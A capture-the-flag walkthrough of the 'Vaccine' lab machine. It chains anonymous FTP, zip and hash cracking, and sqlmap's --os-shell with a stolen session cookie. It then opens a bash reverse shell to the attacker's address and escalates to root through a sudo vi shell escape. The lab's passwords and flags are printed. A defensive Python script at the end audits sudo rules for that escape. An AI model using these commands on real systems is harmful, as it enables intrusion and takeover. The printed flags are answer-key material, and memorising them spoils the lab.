Vaccine
sudo nmap -T4 -Pn -sV -sC -v 10.129.248.153 -oA Vaccine
Besides SSH and HTTP, what other service is hosted on this box?
Answer: FTP
This service can be configured to allow login with any password for specific username. What is that username?
Answer: anonymous
What is the name of the file downloaded over this service?
ftp 10.129.248.153
Answer: backup.zip
What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?
Answer: zip2john
What is the password for the admin user on the website?
backup.zip password: 41852963
Looking at index.html
Put the hash in a file and crack the hash with hashcat
hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
Answer: qwerty789
What option can be passed to sqlmap to try to get command execution via the SQL injection?
Look at the output of sqlmap -h.
Answer: --os-shell
What program can the postgres user run as root using sudo?
Get the cookie from the website.
sqlmap -u 'http://10.129.248.153/dashboard.php?search=any+query' --cookie="PHPSESSID=n33tru7g83ed1hqdgfm42gnqic" --os-shell
We get our shell.
Start the listener and run
bash -c "bash -i >& /dev/tcp/10.10.14.9/443 0>&1"
Answer: vi
Submit user flag
Answer: ec9b13ca4d6229cd5cc1e09980965bf7
Submit root flag
Look at the files in /var/www/html, since the site uses PHP. In the dashboard.php file we see:
user=postgres password=P@s5w0rd!
Looking at the various options on GTFOBins:
Open a file, which we can only do with sudo vi
Type :set shell=/bin/sh
ENTER
:shell
ENTER
Answer: dd6e058e814260bc70e9bbdef2715849
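The root step works because sudo lets postgres run vi as root, and vi can start a shell from its own prompt. The following is an added example, not part of the original walkthrough: it audits `sudo -l` output for rules of that kind. The sample output, host name and file paths are constructed, and the program list is a short illustrative set.

```python
import re

# Programs that can start a shell from their own prompt (vi's :shell here).
EDITORS = {"vi", "vim", "nano", "ed"}
PAGERS = {"less", "more", "man"}

# One rule line of `sudo -l` output: "(runas) [TAG: ...] cmd args[, cmd args]"
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")

# Constructed sample; host name and file paths are placeholders.
SAMPLE = """\
User postgres may run the following commands on host:
    (ALL) /bin/vi /etc/example/app.conf
    (root) NOPASSWD: NOEXEC: /usr/bin/less /var/log/example.log
    (root) sudoedit /etc/example/other.conf
    (www-data) /usr/bin/vim /tmp/example
"""


def audit_sudo_rules(sudo_l_output):
    """Flag rules that let the user run a shell-escaping program as root."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # headers, Defaults entries, blank lines
        runas, tags, cmds = m.groups()
        if runas.split(":")[0].strip() not in ("root", "ALL"):
            continue  # rule does not grant root
        # NOEXEC is meant to stop the program from exec'ing a child shell
        noexec = "NOEXEC" in re.findall(r"[A-Z_]+", tags)
        for cmd in cmds.split(", "):
            argv = cmd.split()
            name = argv[0].rsplit("/", 1)[-1] if argv else ""
            if name not in EDITORS | PAGERS:
                continue  # includes sudoedit, which edits a copy as the caller
            fix = ("sudoedit " + " ".join(argv[1:]) if name in EDITORS and argv[1:]
                   else "restrict or remove the rule")
            findings.append({
                "program": name,
                "command": " ".join(argv),
                "severity": "low" if noexec else "high",
                "fix": fix,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_rules(SAMPLE):
        print(finding)
```

Feed it the real output of `sudo -l -U <user>` collected per account; a "high" finding for an editor is the case exploited on this box.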